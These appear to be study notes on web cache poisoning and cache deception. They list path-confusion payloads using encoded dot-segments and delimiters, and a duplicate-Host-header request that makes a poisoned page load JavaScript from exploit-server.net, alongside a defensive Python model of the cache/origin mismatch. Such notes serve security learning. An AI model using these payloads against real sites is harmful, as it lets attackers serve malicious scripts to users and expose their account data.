# What is Cache Poisoning
Cache poisoning is an attack where malicious data is inserted into a cache, causing it to return incorrect or harmful information. This can mislead users or systems, such as redirecting them to malicious sites or serving corrupted content. It can occur in DNS, web, or CDN caches, and is a serious security risk.
# Searching for Cache Poisoning
## Normal Searching
---------------------------------------------------------------------------------
- GET /my-account
- GET /my-account/abc ---> 404? The origin server does not map this path back to /my-account
- GET /my-accountabc ---> 404? No evidence of caching yet.
- GET /my-account§§abc (Burp Intruder payload position) ---> probe for delimiter discrepancies, i.e. find which characters the origin treats as a path delimiter
---------------------------------------------------------------------------------
## Path Caching
- GET /<arbitrary directory>/..%2fmy-account ---> check how it resolves (200 or 400)
- Try the delimiter both percent-encoded and unencoded when looking for delimiter discrepancies
- Find a resource that is actually cached (images, static resources, ...)
---------------------------------------------------------------------------------
## If the cache server resolves encoded dot-segments but the origin server doesn't, you can exploit this by crafting a payload like this:
- GET /<dynamic-path>%2f%2e%2e%2f<static-directory-prefix> (the `/../` is percent-encoded as %2f%2e%2e%2f)
- ex: /profile%2f%2e%2e%2fstatic
  - The cache interprets the path as: /static
  - The origin server interprets the path as: /profile%2f%2e%2e%2fstatic
- ex: /profile;%2f%2e%2e%2fstatic
  - The cache interprets the path as: /static
  - The origin server interprets the path as: /profile
- Combine a delimiter with a cached path: /my-account?%2f%2e%2e%2fresources
- Use files that are commonly cached (robots.txt, index.html, favicon.ico)
  - /profile%2f%2e%2e%2findex.html
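The following Python is an added illustration, not part of the original notes: it models the two interpretations above (a cache that percent-decodes and resolves dot-segments versus an origin that cuts the path at a delimiter without decoding) and adds a cache-side guard that refuses to store any response where the two views disagree. The `;` and `?` delimiters and the `/static/` and `/resources/` prefixes are assumptions of the model.

```python
from urllib.parse import unquote

# Assumption for this model: the origin treats ';' (path parameter) and '?'
# (query) as the end of the routed path and never percent-decodes it.
ORIGIN_DELIMITERS = (";", "?")


def cache_path(raw: str) -> str:
    """Cache-side view: percent-decode the whole request target once, then
    resolve '.' and '..' segments. This is the behaviour the notes attribute
    to the cache; it turns /profile%2f%2e%2e%2fstatic into /static."""
    out = []
    for seg in unquote(raw).split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if out:
                out.pop()
            continue
        out.append(seg)
    return "/" + "/".join(out)


def origin_path(raw: str) -> str:
    """Origin-side view: cut at the first delimiter, keep the rest verbatim
    (no decoding, no dot-segment resolution)."""
    for d in ORIGIN_DELIMITERS:
        raw = raw.split(d, 1)[0]
    return raw


def has_discrepancy(raw: str) -> bool:
    """True when the cache key and the resource the origin really serves differ,
    i.e. a dynamic response could be stored under a static-looking key."""
    return cache_path(raw) != origin_path(raw)


def safe_to_cache(raw: str, static_prefixes=("/static/", "/resources/")) -> bool:
    """Cache-side guard: store a response only when both views agree and the
    agreed path sits under a known static prefix. Pair this with the origin
    sending Cache-Control: no-store on dynamic routes such as /profile."""
    if has_discrepancy(raw):
        return False
    return any(cache_path(raw).startswith(p) for p in static_prefixes)


if __name__ == "__main__":
    for req in ("/static/app.js", "/profile%2f%2e%2e%2fstatic",
                "/profile;%2f%2e%2e%2fstatic", "/my-account?%2f%2e%2e%2fresources"):
        print(f"{req:38} cache={cache_path(req):16} origin={origin_path(req):30} "
              f"cache_it={safe_to_cache(req)}")
```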
# Exploitation
## Poison header (Targeting Element Source)
```http
GET / HTTP/1.1
Host: website.com
Host: exploit-server.net
```
Then, on the exploit server, create the same directory structure and file name to impersonate the JS file from website.com, so that when the poisoned page loads it fetches the JS file from exploit-server.net instead of website.com.
---------------------------------------------------------------------------------